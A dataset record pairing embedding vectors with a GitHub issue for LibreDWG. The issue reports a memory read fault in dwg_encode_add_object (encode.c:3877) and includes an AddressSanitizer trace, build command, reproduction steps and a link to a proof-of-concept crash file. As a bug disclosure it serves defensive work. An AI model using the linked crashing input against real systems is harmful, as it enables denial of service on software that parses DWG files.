-0.002128216903656721, -0.023698989301919937, 0.008229849860072136, 0.011186637915670872, -0.007179706357419491, -0.0016962428344413638, -0.0005734827718697488, 0.0103599289432168, 0.015476587228477001, 0.00690041296184063, -0.022060466930270195, -0.007805324159562588, 0.016161786392331123, -0.009138485416769981, -0.000011004457519447897, -0.014337069354951382, 0.014538160525262356, -0.02509918063879013, 0.02506938949227333, 0.006606223527342081, 0.03709018602967262, -0.004353255499154329, -0.014523264952003956, -0.019170710816979408, 0.008751198649406433, 0.0026663225144147873, -0.0003330575709696859, 0.017368335276842117, -0.017353439703583717, 0.0033775900956243277, -0.0077531891874969006, 0.00003179873601766303, -0.003980864305049181, 0.030208392068743706, 0.015863874927163124, -0.011983555741608143, -0.00953321997076273, -0.009726863354444504, 0.025531155988574028, 0.004703303333371878, -0.003781634848564863, -0.015968143939971924, 0.012251677922904491, 0.03420042619109154, 0.018351448699831963, 0.0018852315843105316, -0.0026160497218370438, -0.019498415291309357, 0.013011355884373188, -0.015282943844795227, 0.018262075260281563, -0.003980864305049181, 0.0007782980683259666, 0.021598702296614647, 0.004181955475360155, 0.006837106309831142, 0.0016124547692015767, -0.0022511060815304518, -0.0006358583341352642, -0.003936177119612694, 0.008840572088956833, 0.009920507669448853, 0.004543175455182791, -0.003988312091678381, -0.0029065150301903486, -0.011789912357926369, -0.02521834708750248, -0.0006526159704662859, -0.0052209277637302876, 0.005381056107580662, -0.005626834463328123, -0.01154413353651762, -0.001027800259180367, 0.011804807931184769, 0.024175651371479034, 0.012519799172878265, -0.011916525661945343, 0.004826192744076252, 0.024175651371479034, -0.002727766986936331, -0.017189588397741318, 0.015402108430862427, 0.0038616990204900503, 0.011961212381720543, -0.004766609985381365, 0.0022511060815304518, 0.002941892249509692, 0.015417004935443401, -0.005857716780155897, -0.00043104306678287685, 0.004435181617736816, 0.0011330008273944259, -0.007131295744329691, 0.013048594817519188, 0.006863173563033342, -0.010762112215161324, 0.006565260700881481, -0.0025695008225739002, -0.019766535609960556, 0.0030256803147494793, 0.016131995245814323, 0.009615146555006504, -0.0006568053504452109, -0.01863446645438671, -0.0035786814987659454, -0.008929946459829807, 0.017278961837291718, -0.0015044612810015678, -0.013242238201200962, 0.0011572063667699695, 0.017725830897688866, -0.010501437820494175, -0.006140734534710646, 0.004282501060515642, 0.007269080262631178, 0.0024373019114136696, 0.010292898863554, 0.008706510998308659, 0.009734311141073704, -0.004837364424020052, 0.00019783293828368187, 0.006118390709161758, 0.0025732247158885, -0.004971425514668226, -0.019945284351706505, 0.0007699192501604557, 0.01863446645438671, -0.0026234975084662437, -0.0009323750273324549, -0.004729371052235365, -0.014001917093992233, 0.010292898863554, -0.00630831066519022, 0.0007312836241908371, 0.01142496895045042, -0.006658358499407768, 0.013852960430085659, 0.007820219732820988, 0.004189403261989355, -0.015819186344742775, 0.01912602223455906, -0.001850785338319838, -0.022745667025446892, -0.0033049737103283405, 0.0015528722433373332, 0.024041589349508286, -0.0012484422186389565, -0.016042621806263924, -0.017636457458138466, 0.011842046864330769, -0.008713958784937859, -0.01265386026352644, 0.017740726470947266, -0.006710493471473455, 0.009622594341635704, 0.0038691468071192503, 0.01870894432067871, 0.01884300634264946, -0.0077755325473845005, 0.008609689772129059, -0.003895214293152094, 0.0075483741238713264, -0.0006647186819463968, 0.019662266597151756, -0.016236266121268272, 0.00631948234513402, -0.004662340506911278, 0.013018803671002388, -0.01473925169557333, -0.004073962103575468, 0.022403066977858543, -0.015714917331933975, -0.015640439465641975, -0.030491407960653305, -0.009160828776657581, 0.006643462926149368, -0.006609947420656681, 0.03750726208090782, -0.017621561884880066, 0.007067989092320204, 0.009198067709803581, -0.005012388341128826, 0.008669272065162659, 0.016370326280593872, 0.0019122299272567034, -0.005492773372679949, -0.01061315555125475, -0.007715950254350901, -0.008088341914117336, -0.005865164566785097, -0.007257908582687378, 0.001762342406436801, 0.021375266835093498, 0.01851530186831951, 0.017338544130325317, -0.006758904084563255, -0.008736302144825459, -0.013934887014329433, -0.0206751711666584, -0.014143425971269608, 0.0020779441110789776, 0.019915493205189705, -0.00015593890566378832, -0.00825964193791151, -0.005544908344745636, 0.004301120992749929, 0.01872383989393711, -0.003617782611399889, -0.0022790355142205954, -0.006561536807566881, -0.014173217117786407, 0.006058808416128159, 0.013406090438365936, 0.0021840755362063646, 0.034855835139751434, 0.011782464571297169, -0.028391120955348015, -0.0009924231562763453, -0.026573851704597473, -0.008430941961705685, -0.0010399030288681388, -0.006528021302074194, 0.0010101116495206952, 0.0004482661606743932, -0.021911511197686195, 0.024265024811029434, 0.003064781427383423, -0.010762112215161324, 0.014188112691044807, -0.012288916856050491, -0.0011860666563734412, -0.008125580847263336, -0.006662082392722368, -0.006487058475613594, 0.015878770500421524, -0.012110169045627117, -0.02344576269388199, 0.003526546759530902, 0.030342452228069305, 0.002137526636943221, 0.03119150549173355, -0.008430941961705685, 0.00948853325098753, -0.008006415329873562, 0.008751198649406433, 0.0010054567828774452, -0.012430425733327866, -0.023505346849560738, 0.0045282794162631035, -0.007976624183356762, 0.013309269212186337, 0.011313251219689846, -0.0032286334317177534, 0.010121598839759827, 0.00954811554402113, -0.0031988422852009535, -0.007395693566650152, -0.004312292672693729, -0.026558956131339073, 0.0037592912558466196, 0.014277487061917782, -0.017517292872071266, 0.009674728848040104, -0.006673254072666168, -0.026484476402401924, 0.0025564669631421566, 0.0012419254053384066, 0.007239289116114378, 0.015759604051709175, 0.007220669649541378, -0.02715478092432022, -0.03116171434521675, -0.0025583289097994566, -0.010806798934936523, -0.02296910248696804, -0.01156647689640522, 0.000465721997898072, 0.017353439703583717, -0.011067472398281097, 0.0012233058223500848, 0.006606223527342081, 0.008118133060634136, -0.008892706595361233, 0.016280952841043472, -0.013003908097743988, 0.009123589843511581, -0.01692146621644497, 0.001022214419208467, 0.021598702296614647, -0.016429908573627472, -0.011037681251764297, -0.0018107532523572445, -0.021539120003581047, 0.0036661934573203325, -0.014322173781692982, 0.012125064618885517, 0.013391194865107536, -0.005954538471996784, -0.0002960511774290353, -0.011633507907390594, -0.008006415329873562, 0.013867856003344059, 0.009287442080676556, 0.018351448699831963, 0.018083326518535614, -0.005660349503159523, -0.0036010248586535454, 0.015215912833809853, 0.01884300634264946, 0.0021580082830041647, 0.007835115306079388, 0.011208981275558472, -0.008751198649406433, 0.01905154436826706, 0.005436914507299662, 0.015655335038900375, 0.023639407008886337, -0.007864906452596188, 0.0000034111635613953695, 0.013711451552808285, -0.00828198529779911, 0.002347927773371339, 0.019781431183218956, 0.015908561646938324, 0.012378290295600891, 0.021762553602457047, 0.010441855527460575, -0.005578423384577036, -0.000647030072286725, 0.02282014489173889, 0.006613671313971281, 0.019706953316926956, -0.008237297646701336, 0.010561020113527775, 0.01701083965599537, 0.013204999268054962, 0.0032118759118020535, -0.002865551970899105, 0.0044053904712200165, -0.013167760334908962, -0.023713884875178337, -0.016429908573627472, -0.007529754191637039, -0.028391120955348015, -0.0033645564690232277, -0.01903664879500866, 0.01272833812981844, 0.0012773025082424283, 0.01912602223455906, -0.005537460092455149, 0.005310301668941975, 0.004282501060515642, 0.004833640530705452, -0.0053438167087733746, -0.01881321333348751, -0.01863446645438671, -0.020243197679519653, -0.0028469322714954615, 0.000738731469027698, -0.0043793232180178165, -0.00316905090585351, -0.0037443956825882196, 0.006014121230691671, -0.017532188445329666, 0.0009803203865885735, -0.01686188392341137, 0.031012756749987602, 0.01866425760090351, -0.006840830203145742, 0.02110714465379715, -0.0012400634586811066, -0.0425717867910862, -0.005083142779767513, -0.005537460092455149, 0.02515876293182373, 0.0052209277637302876, -0.006643462926149368, -0.002792935585603118, 0.016370326280593872, -0.010695081204175949, -0.020243197679519653, 0.005921023432165384, -0.016131995245814323, 0.012847503647208214, 0.006632291246205568, 0.00632320623844862, -0.015372317284345627, 0.014821178279817104, 0.0077755325473845005, 0.016310743987560272, 0.015387212857604027, 0.005418295040726662, 0.014404099434614182, 0.0045282794162631035, 0.004792677704244852, -0.01062060333788395, 0.0006200317293405533, 0.019930388778448105, -0.007686158642172813, 0.03414084389805794, -0.008200058713555336, -0.0012745095882564783, -0.007701054215431213, -0.0103599289432168, -0.0033012498170137405, 0.004736818838864565, 0.004803849384188652, 0.019960179924964905, -0.016474595293402672, 0.006773799657821655, 0.0002488040190655738, 0.01375613920390606, -0.003803978208452463, -0.023773467168211937, 0.0037723251152783632, -0.013212447054684162, 0.004356979392468929, -0.007902145385742188, -0.003264010651037097, -0.024801267310976982, 0.0003530736139509827, -0.011722881346940994, 0.006770075764507055, 0.001027800259180367, -0.0017576874233782291, 0.015268048271536827, 0.031102130189538002, 0.008803333155810833, -0.006762627977877855, 0.0022566919215023518, 0.012147407978773117, 0.018366344273090363, -0.008237297646701336, -0.011789912357926369, -0.018276970833539963, -0.005459258332848549, -0.000418707582866773, 0.005690140649676323, 0.0007480412605218589, 0.0011711709666997194, -0.014500921592116356, 0.0014411547454074025, 0.0053438167087733746, 0.007049369625747204, 0.002481988864019513, 0.0069562713615596294, 0.0009942851029336452, 0.005835373420268297, 0.006870621349662542, 0.007723398040980101, -0.003269596491008997, -0.013361403718590736, 0.00023553756182081997, 0.019185606390237808, -0.002418682212010026, 0.03720935061573982, 0.010151389986276627, -0.013182655908167362, 0.007715950254350901, -0.006531745195388794, -0.0013461950002238154, 0.0032770445104688406, 0.021613597869873047, 0.00831922423094511, 0.009414054453372955, 0.01258683018386364, -0.0015947662759572268, 0.004867155570536852, 0.012758130207657814, 0.02283504232764244, -0.01149199903011322, 0.0044165621511638165, 0.010806798934936523, -0.012564485892653465, 0.00572738004848361, -0.006494506262242794, 0.02967214770615101, -0.0014141564024612308, 0.0019438831368461251, 0.003962244838476181, -0.014798834919929504, 0.0016469010151922703, 0.04653403162956238, -0.015342526137828827, -0.004327188245952129, -0.010278003290295601, -0.006043912842869759, -0.001402053632773459, -0.030267974361777306, 0.020734753459692, 0.006993510760366917, 0.02106245793402195, -0.0020202232990413904, 0.002804107265546918, -0.006207765080034733, 0.007473895791918039, 0.0005297267925925553, -0.0019252635538578033, 0.011156846769154072, 0.003939901012927294, -0.008490524254739285, -0.008036206476390362, 0.01266875583678484, -0.020511319860816002, 0.00046828220365568995, 0.008892706595361233, -0.0021952474489808083, -0.01342098694294691, -0.012936878018081188, -0.00044151657493785024, -0.013301821425557137, 0.007998967543244362, -0.009630042128264904, -0.008952289819717407, -0.01269854698330164, -0.014508369378745556, -0.0035805434454232454, -0.01674271747469902, -0.012579381465911865, 0.01268365141004324, -0.008110685274004936, 0.009868372231721878, -0.018202492967247963, -0.011946316808462143, -0.02282014489173889, -0.0012540280586108565, 0.018142908811569214, -0.014307278208434582, -0.011343042366206646, 0.006855725776404142, -0.026261042803525925, 0.00631948234513402, -0.007701054215431213, 0.013137969188392162, -0.006148182321339846, 0.0023833049926906824, 0.0007582820253446698, 0.0019382972968742251, -0.02305847592651844, -0.005876336712390184, 0.03735830634832382, 0.004427733831107616, 0.024548042565584183, 0.02317764237523079, -0.003552614012733102, 0.004982597194612026, -0.001393674872815609, -0.004323464352637529, -0.02514386735856533, -0.012765577994287014, 0.00009635627793613821, -0.008944842033088207, -0.008222402073442936, -0.014188112691044807, 0.008006415329873562, -0.018336553126573563, -0.010687633417546749, -0.0025881202891469, -0.015491482801735401, -0.008535210974514484, -0.005146449431777, 0.011052576825022697, 0.004137268755584955, -0.0023572377394884825, 0.012080376967787743, 0.012177199125289917, 0.019572893157601357, 0.0011963073629885912, -0.01665334403514862, 0.0004622308479156345, -0.011030233465135098, 0.00956301111727953, -0.014121082611382008, -0.020109135657548904, -0.015044612810015678, -0.01353270374238491, 0.00946618989109993, 0.013651869259774685, -0.019617579877376556, 0.0006828727782703936, 0.004844812210649252, -0.020079344511032104, 0.024041589349508286, 0.004617653321474791, 0.02104756236076355, 0.006423751823604107, -0.01473925169557333, 0.011156846769154072, 0.006434923503547907, -0.0025490191765129566, 0.011752673424780369, -0.020526215434074402, -0.012177199125289917, -0.021494431421160698, -0.008006415329873562, -0.008140476420521736, 0.011067472398281097, -0.0035153748467564583, -0.001964364666491747, -0.04415072500705719, -0.0206006933003664, 0.016459699720144272, 0.014873312786221504, 0.009272546507418156, 0.023773467168211937, -0.011022785678505898, -0.007998967543244362, -0.01704063080251217, 0.008490524254739285, 0.006137010641396046, 0.01888769306242466, -0.0206304844468832, 0.001666451571509242, 0.018262075260281563, -0.006375341210514307, -0.012192094698548317, 0.05419039726257324, 0.018411030992865562, 0.027914460748434067, 0.015580857172608376, 0.0021803516428917646, 0.011648403480648994, -0.004710751585662365, -0.019557997584342957, -0.00946618989109993, 0.001856371178291738, 0.000415449176216498, -0.01458284817636013, 0.019423935562372208, -0.013636973686516285, 0.0051725166849792, 0.011186637915670872, -0.01881321333348751, 0.005541184451431036, -0.002711009467020631, -0.022030675783753395, -0.012333603575825691, -0.002485712757334113, 0.020183615386486053, -0.017442813143134117, 0.00835646316409111, 0.0018405445152893662, 0.00030419722315855324, -0.005835373420268297, 0.0009905612096190453, -0.01063549891114235, 0.022492440417408943, -0.016415013000369072, -0.012482560239732265, 0.02503959834575653, 0.004204298835247755, 0.011261116713285446, 0.018053535372018814, 0.009287442080676556, 0.01891748420894146, 0.0001586154685355723, -0.02533751167356968, 0.010062015615403652, -0.004107477143406868, 0.0027631442062556744, -0.0017102075507864356, -0.005332645028829575, 0.007537201978266239, -0.006278519053012133, 0.022447753697633743, 0.02313295379281044, 0.02094329334795475, 0.012236781418323517, -0.009965194389224052, 0.010278003290295601, -0.0034930314868688583, -0.00840114988386631, 0.0004859707842115313, -0.00016047742974478751, 0.001115312334150076, -0.0069562713615596294, 0.002724043093621731, -0.016087308526039124, -0.02097308449447155, 0.00631203455850482, -0.015908561646938324, -0.015565960668027401, 0.009905611164867878, 0.013927439227700233, -0.026067398488521576, 0.0059806061908602715, 0.006118390709161758, 0.007108951918780804, -0.0037462576292455196, -0.005798134487122297, -0.03390251472592354, -0.01692146621644497, 0.028152789920568466, -0.01065039448440075, 0.012214438058435917, -0.003533994546160102, -0.016400117427110672, -0.014173217117786407, 0.01156647689640522, -0.002889757277444005, -0.0027501105796545744, -0.003353384556248784, 0.002243658294901252, -0.014493473805487156, -0.013376299291849136, 0.00576834287494421, 0.0011879286030307412, 0.0003789082693401724, -0.019706953316926956, -0.002420544158667326, 0.016072412952780724, -0.00946618989109993, -0.008639480918645859, -0.018336553126573563, 0.0006628567352890968, 0.02301378920674324, -0.003958520945161581, 0.022358380258083344, -0.026707911863923073, -0.004569242708384991, 0.023982007056474686, -0.01149944681674242, -0.009689624421298504, -0.015357421711087227, -0.011834599077701569, 0.008155371993780136, 0.008594794198870659, 0.006974891293793917, -0.020392153412103653, -0.0032826303504407406, 0.015670230612158775, 0.009153380990028381, 0.007570717483758926, -0.000926323642488569, 0.019692057743668556, 0.00828198529779911, -0.009071454405784607, -0.004230366554111242, 0.011886733584105968, 0.01893237978219986, 0.009778998792171478, 0.01353270374238491, -0.0005511392955668271, 0.024607624858617783, -0.000011862703104270622, 0.008222402073442936, -0.013644421473145485, -0.01375613920390606, 0.03217461705207825, 0.01860467530786991, 0.014947791583836079, -0.00571620836853981, -0.004990044981241226, 0.009384263306856155, 0.026603642851114273, -0.001960640773177147, -0.010918516665697098, 0.05401165038347244, 0.0006870621582493186, -0.001208410132676363, 0.007738293614238501, 0.011223876848816872, -0.004960253834724426, 0.005276786163449287, -0.0009505290654487908, -0.023922424763441086, 0.0033701423089951277, 0.002966097556054592, 0.017457708716392517, 0.0026104638818651438, 0.002414958318695426, -0.009093798696994781, 0.02962746098637581, 0.010769560001790524, -0.013316716998815536, 0.007909593172371387, -0.004558071028441191, 0.0014970134943723679, -0.00026463065296411514, 0.007097780238837004, -0.0009849752532318234, -0.002800383372232318, 0.008892706595361233, -0.003090848680585623, 0.006133286748081446, -0.0038654229138046503, -0.02284993790090084, -0.008699063211679459, 0.01158137246966362, -0.017606666311621666, 0.011819703504443169, 0.014873312786221504, 0.013048594817519188, 0.011700537987053394, 0.0212858933955431, 0.008982080966234207, 0.022254111245274544, -0.008937394246459007, -0.0211965199559927, 0.012050585821270943, 0.030923383310437202, -0.004986321087926626, -0.0008560347487218678, -0.02691645175218582, 0.01059825997799635, 0.010896172374486923, 0.010844037868082523, -0.018247179687023163, 0.01465732604265213, -0.002396338852122426, -0.00946618989109993, 0.02529282495379448, 0.017770517617464066, 0.011663299053907394, 0.001119967200793326, -0.02483106032013893, -0.0031187781132757664, -0.009749207645654678, -0.008103237487375736, 0.0211667288094759 ]
214
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? Segmentation fault in dwg_encode_add_object in encode.c:3877 because of reading unknown address. ASAN report: ``` $ ./dwgrewrite ./pocs/tests_64229 ...... ...... ...... ==2884155==ERROR: AddressSanitizer: SEGV on unknown address 0x7fffe435c89f (pc 0x0000004ab9e0 bp 0x7fffffffc360 sp 0x7fffffffbb10 T0) ==2884155==The signal is caused by a READ memory access. #0 0x4ab9e0 in __sanitizer::internal_memmove(void*, void const*, unsigned long) /src/llvm-project-12.0.0.src/compiler-rt/lib/sanitizer_common/sanitizer_libc.cpp:68:16 #1 0x497605 in __asan_memmove /src/llvm-project-12.0.0.src/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3 #2 0xfe6ba3 in memmove /usr/include/x86_64-linux-gnu/bits/string_fortified.h:40:10 #3 0xfe6ba3 in dwg_encode_add_object /src/libredwg/src/encode.c:3877:11 #4 0xf98c78 in dwg_encode /src/libredwg/src/encode.c:2352:16 #5 0x4cbcf6 in dwg_write_file /src/libredwg/src/dwg.c:429:11 #6 0x4c939f in main /src/libredwg/programs/dwgrewrite.c:349:11 #7 0x7ffff7c580b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x41c3fd in _start (/mnt/disk/out/libredwg/programs_asan/dwgrewrite+0x41c3fd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/llvm-project-12.0.0.src/compiler-rt/lib/sanitizer_common/sanitizer_libc.cpp:68:16 in __sanitizer::internal_memmove(void*, void const*, unsigned long) ==2884155==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64229.zip dwgrewrite ./tests_64229 ``` POC file : [tests_64229.zip](https://github.com/LibreDWG/libredwg/files/6622261/tests_64229.zip)
READ unknown address in dwg_encode_add_object in encode.c:3877
https://api.github.com/repos/LibreDWG/libredwg/issues/364/comments
3
2021-06-09T08:27:30
2023-06-27T10:20:47Z
https://github.com/LibreDWG/libredwg/issues/364
915,935,218
364
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : READ unknown address in dwg_encode_add_object in encode.c:3877 Issue date: --- start body --- ## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? Segmentation fault in dwg_encode_add_object in encode.c:3877 because of reading unknown address. ASAN report: ``` $ ./dwgrewrite ./pocs/tests_64229 ...... ...... ...... ==2884155==ERROR: AddressSanitizer: SEGV on unknown address 0x7fffe435c89f (pc 0x0000004ab9e0 bp 0x7fffffffc360 sp 0x7fffffffbb10 T0) ==2884155==The signal is caused by a READ memory access. #0 0x4ab9e0 in __sanitizer::internal_memmove(void*, void const*, unsigned long) /src/llvm-project-12.0.0.src/compiler-rt/lib/sanitizer_common/sanitizer_libc.cpp:68:16 #1 0x497605 in __asan_memmove /src/llvm-project-12.0.0.src/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3 #2 0xfe6ba3 in memmove /usr/include/x86_64-linux-gnu/bits/string_fortified.h:40:10 #3 0xfe6ba3 in dwg_encode_add_object /src/libredwg/src/encode.c:3877:11 #4 0xf98c78 in dwg_encode /src/libredwg/src/encode.c:2352:16 #5 0x4cbcf6 in dwg_write_file /src/libredwg/src/dwg.c:429:11 #6 0x4c939f in main /src/libredwg/programs/dwgrewrite.c:349:11 #7 0x7ffff7c580b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x41c3fd in _start (/mnt/disk/out/libredwg/programs_asan/dwgrewrite+0x41c3fd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /src/llvm-project-12.0.0.src/compiler-rt/lib/sanitizer_common/sanitizer_libc.cpp:68:16 in __sanitizer::internal_memmove(void*, void const*, unsigned long) ==2884155==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64229.zip dwgrewrite ./tests_64229 ``` POC file : [tests_64229.zip](https://github.com/LibreDWG/libredwg/files/6622261/tests_64229.zip) --- end body ---
2,173
[ -0.019938211888074875, -0.000055477561545558274, 0.0028419392183423042, 0.007417312357574701, 0.04103700444102287, 0.03425206243991852, 0.002806600881740451, 0.05285114049911499, -0.0033961916342377663, 0.021619567647576332, -0.013272302225232124, 0.003223220119252801, 0.02892528660595417, -0.006446440238505602, -0.01022949256002903, 0.00329017685726285, -0.03204993158578873, -0.003368292935192585, -0.016515981405973434, -0.009314417839050293, 0.02181299775838852, -0.0032771574333310127, 0.011925728991627693, 0.030740555375814438, -0.006695668213069439, 0.017855115234851837, -0.01648622192442417, -0.0031432441901415586, -0.01563810557126999, 0.005847549997270107, -0.02685706876218319, 0.02257184125483036, -0.00817615445703268, 0.005695037543773651, 0.053148724138736725, 0.02028043381869793, 0.04987528920173645, 0.04303082823753357, 0.0032622781582176685, 0.04603643715381622, -0.005676438566297293, -0.0708848088979721, -0.0010062101064249873, 0.007283398881554604, -0.013063992373645306, -0.01025181170552969, 0.022378411144018173, 0.016456464305520058, -0.03127621114253998, 0.03383544087409973, -0.020473865792155266, -0.00957480538636446, -0.032555826008319855, -0.06279049068689346, 0.016679653897881508, -0.02072681300342083, 0.030085869133472443, 0.033002205193042755, -0.002603870816528797, 0.009850071743130684, -0.009277219884097576, 0.023628268390893936, -0.009604563936591148, 0.028597941622138023, -0.00759214349091053, 0.03285340964794159, -0.016962358728051186, 0.015504191629588604, -0.01347317174077034, 0.0023676627315580845, 0.007346635684370995, -0.029862679541110992, 0.0072945584543049335, 0.03722791373729706, 0.04169169440865517, -0.004043439403176308, 0.011970366351306438, 0.02072681300342083, -0.010802344419062138, 0.010021183639764786, 0.009202823974192142, 0.04329865425825119, -0.007253640331327915, 0.016367187723517418, 0.008369585499167442, -0.010259251110255718, -0.011337998323142529, -0.06939688324928284, -0.010169975459575653, -0.022943822667002678, -0.0005147294723428786, 0.01901569776237011, 0.02423831820487976, 0.010713068768382072, -0.0022318894043564796, -0.025800641626119614, -0.044310443103313446, -0.0029628330375999212, -0.039906181395053864, 0.012208434753119946, -0.020756570622324944, 0.010846982710063457, -0.029044320806860924, 0.031782105565071106, 0.03166307136416435, 0.0016664774157106876, 0.01824197545647621, -0.0017687722574919462, 0.017825355753302574, 0.13867472112178802, -0.005311896558851004, 0.0007555875345133245, -0.001268457155674696, 0.0046051316894590855, -0.00562064116820693, 0.022051066160202026, 0.013376456685364246, 0.005252379458397627, -0.043328411877155304, -0.012379546649754047, -0.008205913007259369, -0.054636649787425995, -0.013205345720052719, -0.01752777025103569, -0.006182333454489708, 0.013666602782905102, -0.0015307040885090828, -0.010437802411615849, -0.029996592551469803, -0.004248029552400112, -0.006450160406529903, -0.05609481781721115, -0.0022988461423665285, -0.009686400182545185, 0.025086436420679092, 0.012134038843214512, -0.03591853752732277, 0.024729333817958832, 0.03469844162464142, 0.0100509412586689, -0.08010994642972946, -0.0519881434738636, -0.007655380293726921, -0.008607652969658375, -0.005624361336231232, 0.011300799436867237, -0.0070676496252417564, 0.001835728995501995, 0.010169975459575653, -0.020890483632683754, -0.02487812750041485, -0.00804224144667387, 0.013577327132225037, 0.0362161248922348, 0.02870209701359272, -0.005832670722156763, 0.010713068768382072, 0.017200427129864693, -0.011836453340947628, -0.021619567647576332, 0.011598384939134121, -0.025443539023399353, 0.0001415854785591364, -0.047881465405225754, -0.020206037908792496, 0.014886702410876751, 0.04344744607806206, 0.033329546451568604, 0.005944265518337488, 0.028330115601420403, 0.02130710333585739, -0.011315679177641869, 0.04023352637887001, 0.0030056110117584467, -0.0453222319483757, -0.00957480538636446, -0.008845721371471882, 0.018807386979460716, 0.0012870562495663762, 0.004783682990819216, -0.002469957573339343, 0.004977113101631403, -0.0090540312230587, 0.019878694787621498, 0.011717419140040874, -0.024000249803066254, 0.019268644973635674, -0.05371413752436638, 0.019075214862823486, 0.0238812156021595, -0.01595056988298893, -0.027243928983807564, -0.010236932896077633, -0.005077548325061798, 0.013272302225232124, -0.02059289999306202, -0.028538424521684647, -0.02181299775838852, -0.01626303419470787, -0.011003214865922928, 0.005066388752311468, -0.00028456590371206403, -0.026827309280633926, 0.010817224159836769, -0.02347947657108307, -0.017676563933491707, -0.04636378213763237, 0.033180754631757736, -0.0014209696091711521, -0.03704936429858208, -0.006595232989639044, -0.04811953380703926, -0.0005970303900539875, 0.00045056265662424266, -0.0071680848486721516, 0.018316371366381645, 0.003448269097134471, -0.01075026672333479, -0.02483348920941353, -0.006230690982192755, 0.03591853752732277, -0.01797414943575859, 0.009492969140410423, 0.015429794788360596, -0.06368324160575867, 0.00874156691133976, 0.021649327129125595, 0.0061637344770133495, -0.02063753642141819, -0.012260512448847294, 0.04651257395744324, -0.01603984460234642, 0.015266123227775097, 0.010318768210709095, 0.008548135869204998, 0.0020700774621218443, -0.0039058064576238394, -0.00937393493950367, -0.016188638284802437, -0.011516548693180084, 0.004195951856672764, 0.038328979164361954, -0.0482088103890419, -0.03472819924354553, -0.004173633176833391, 0.06636150926351547, -0.0444294773042202, 0.006044700276106596, -0.004824600648134947, 0.015593467280268669, 0.01572738029062748, -0.022363530471920967, 0.029773404821753502, -0.005858709570020437, 0.017155788838863373, 0.005252379458397627, 0.014239453710615635, 0.01608448289334774, -0.009969105944037437, -0.012208434753119946, 0.02519059181213379, 0.012751528061926365, -0.023122373968362808, 0.0025573731400072575, 0.010021183639764786, -0.0068444604985415936, -0.03041321225464344, -0.010527078062295914, 0.022467685863375664, -0.03654346987605095, 0.04002521559596062, -0.030204903334379196, -0.022809909656643867, -0.033359307795763016, -0.04306058585643768, 0.018227096647024155, 0.027065377682447433, -0.0103857247158885, 0.007402433082461357, -0.016010086983442307, -0.022452807053923607, -0.0035840424243360758, -0.02779446169734001, 0.023003339767456055, 0.002324884757399559, -0.0424356572329998, 0.004173633176833391, -0.02545841783285141, -0.007517747115343809, -0.030070988461375237, 0.009976545348763466, 0.015139649622142315, -0.05371413752436638, 0.015623225830495358, -0.01833125203847885, 0.0232116486877203, 0.012729208916425705, -0.034817472100257874, -0.010169975459575653, -0.026247018948197365, 0.01712603121995926, -0.02505667693912983, 0.001339133596047759, -0.010341087356209755, -0.019491834565997124, -0.013592205941677094, -0.007915767841041088, 0.0008146396139636636, -0.00903171207755804, -0.0000892755706445314, 0.04651257395744324, -0.0439830981194973, -0.010214613750576973, 0.0029181952122598886, 0.0036286800168454647, -0.0284342709928751, 0.007893448695540428, -0.025622090324759483, 0.015095011331140995, 0.009024272672832012, -0.06302855163812637, 0.004556774161756039, -0.03359737619757652, -0.026619000360369682, 0.03972763195633888, -0.025741124525666237, 0.007171804551035166, 0.04725653678178787, -0.052791621536016464, 0.003712375881150365, 0.000025239529350074008, -0.00036151957465335727, -0.01752777025103569, -0.02627677656710148, -0.013934428803622723, -0.024654937908053398, -0.016426704823970795, 0.006535715889185667, -0.00392068549990654, -0.006896538194268942, -0.011635582894086838, 0.02510131523013115, -0.019179368391633034, -0.023092614486813545, 0.011509109288454056, 0.012550657615065575, 0.02370266430079937, 0.0030521086882799864, 0.026752913370728493, 0.021098794415593147, 0.0009346036822535098, 0.025919675827026367, -0.006212092004716396, 0.029446059837937355, -0.007313157431781292, -0.017319461330771446, -0.028776492923498154, -0.03603757172822952, 0.00634228577837348, -0.0038425694219768047, 0.00025992211885750294, -0.017111152410507202, 0.02199154905974865, -0.00565411988645792, 0.02172372303903103, 0.029267508536577225, 0.021917153149843216, -0.007335476111620665, -0.015697622671723366, -0.038864634931087494, -0.025354262441396713, 0.0621953159570694, -0.020354831591248512, -0.03550191968679428, -0.008205913007259369, -0.012825923971831799, 0.024759093299508095, 0.019447196274995804, -0.01469327136874199, 0.01448496151715517, -0.0036788976285606623, -0.0011094349902123213, 0.0019305843161419034, -0.034757956862449646, 0.026008950546383858, 0.0373171903192997, -0.011635582894086838, 0.04329865425825119, -0.023643147200345993, -0.04457826912403107, -0.031841620802879333, 0.0339842364192009, -0.027943255379796028, -0.05612457916140556, 0.027184411883354187, 0.03324027359485626, 0.0029925915878266096, -0.0056727188639342785, 0.027139773592352867, -0.047197021543979645, -0.0000714902053005062, 0.008005043491721153, 0.029803162440657616, 0.0103857247158885, 0.007900888100266457, 0.03541264310479164, 0.01825685426592827, -0.007655380293726921, 0.022631358355283737, 0.011062731966376305, 0.004571653436869383, -0.003998801577836275, -0.027318324893712997, -0.0015000156126916409, 0.041304830461740494, 0.03303196281194687, -0.016768928617239, -0.007264799904078245, -0.060439564287662506, 0.030472729355096817, -0.01892642118036747, -0.009857511147856712, -0.016337430104613304, 0.03797187656164169, -0.009165626019239426, 0.017066514119505882, -0.029728766530752182, 0.03279389441013336, 0.019402557983994484, -0.03148451820015907, -0.00716436468064785, 0.0263214148581028, 0.028196202591061592, 